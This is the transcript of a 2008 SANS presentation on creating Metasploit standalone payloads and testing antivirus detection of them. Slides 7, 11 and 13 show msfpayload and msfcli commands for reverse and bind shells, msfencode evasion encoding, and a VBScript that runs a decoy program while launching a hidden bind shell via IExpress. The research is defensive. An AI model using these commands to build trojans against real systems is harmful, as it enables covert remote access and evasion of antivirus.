1 / 15

Metasploit Payloads and Antivirus

Metasploit Payloads and Antivirus . Mark Baggett December 2008 GIAC GSEC GCIH. Objectives. Learn how an attacker might use Metasploit standalone payloads against you See how these payloads are created, used and “trojanized” Understand what level of protection to expect from your antivirus.

nakia
Download Presentation

Metasploit Payloads and Antivirus

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH SANS Technology Institute - Candidate for Master of Science Degree

  2. Objectives • Learn how an attacker might use Metasploit standalone payloads against you • See how these payloads are created, used and “trojanized” • Understand what level of protection to expect from your antivirus SANS Technology Institute - Candidate for Master of Science Degree

  3. How are they used against you? • Can be executed by tricking a user into running the payload or via an exploit that is not in the framework • Execute a payload on a fully patched system • Use Meterpreter’s advanced functionality such as anti-forensics, detection evasion, and pivoting • Scenario: • Attacker bruteforces password to a fully patched machine • Runs Meterpreter payload and uses it to pivot • Uses framework to attack other hosts on DMZ SANS Technology Institute - Candidate for Master of Science Degree

  4. msfpayload • Generates payloads in various formats • Source code in C, Perl, Ruby, Java • Hexadecimal (RAW) • Binary executable formats for Win32; Linux; OS X on Intel, PPC, iPhone • Java automatically selects Big Endian or Little Endian depending upon processor of targeted payload • You can override this with a simple modification to msfpayload (js_be, js_le) SANS Technology Institute - Candidate for Master of Science Degree

  5. Demonstration • See how these payloads are created SANS Technology Institute - Candidate for Master of Science Degree

  6. Interacting with payloads • Some payloads will not work standalone • find_port, find_tag • Bind shell payloads can be used outside of the framework • Others require the use of the multi/handler exploit SANS Technology Institute - Candidate for Master of Science Degree

  7. Using multi/handler CREATION - LHOST is the attacker’s IP ./msfcli exploit/multi/handler \ PAYLOAD=windows/vncinject/reverse_tcp \ RHOST=192.168.100.3 \ DisableCourtesyShell=TRUE E ./msfpayload \ windows/vncinjection/reverse_tcp \ LHOST=192.168.100.5 X > vncrev.exe USE - RHOST is the victim’s IP SANS Technology Institute - Candidate for Master of Science Degree

  8. Demonstration • See how these payloads are used SANS Technology Institute - Candidate for Master of Science Degree

  9. msfencode • Will encode a payload using one of various algorithms • Expects RAW msfpayload as input • -h for help • -l list of available encoders • -e encoder to use • -t output type • -b characters to avoid SANS Technology Institute - Candidate for Master of Science Degree

  10. msfencode -> Binary • Binary was not a selectable output type from msfencode until Sept 29th 2008 • 3 ways to create a binary • Add 3 lines of code to msfencode • Generate RAW output and use a hex editor to place it in a binary PE format • Generate C source code and compile it • -t exe option will encode a Windows binary SANS Technology Institute - Candidate for Master of Science Degree

  11. msfencode (continued) • ./msfpayload windows/shell_bind_tcp R |\ ./msfencode -e x86/shikata_ga_nia -t exe • ./msfpayload windows/shell_bind_tcp R |\ ./msfencode -e x86/shikata_ga_nia –b\ “\x41\x42\x43” -t exe • Text.to_win32pe() uses /data/templates • Use your own binaries with “PAYLOAD:” tag • To_win32pe chooses a random base relocation address (4 bytes at position 0x88) • Roll your own with template.c SANS Technology Institute - Candidate for Master of Science Degree

  12. Turning payloads into trojans • IExpress is a setup utility that comes with Windows XP • Can create packages that visibly execute a benign host program and invisibly execute a malicious payload • All you need is a small VBscript to execute your payload invisibly • Trojan payloads only temporarily avoid antivirus SANS Technology Institute - Candidate for Master of Science Degree

  13. Payload script • The script Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "mspaint.exe",1, False Wshshell.Run "bindshell.exe",0, False • Quick IExpress Demonstration • See how these payloads are “trojanized” SANS Technology Institute - Candidate for Master of Science Degree

  14. Expected results: Low rate of detection for unencoded payloads and no detection for encoded payloads Actual results: No detection for unencoded payloads or encoded payloads 2 products’ heuristics flagged payloads Pauldotcom Episode 125 at the end of September 2008 found 6 systems detected the payload My HIPS testing yielded disappointing results HD Moore has stated that version 3.2 will generate a new Windows Binary that is harder to detect. Level of protection to expect from your antivirus SANS Technology Institute - Candidate for Master of Science Degree

  15. Summary • Metasploit is a powerful framework with a diverse set of tools • Using these tools attackers can easily create standalone payloads that run on fully patched systems • Antivirus products do not at this time provide adequate protection against Metasploit payloads • My paper is in the SANS reading room titled “Effectiveness of Antivirus Detecting Metasploit Payloads” SANS Technology Institute - Candidate for Master of Science Degree

More Related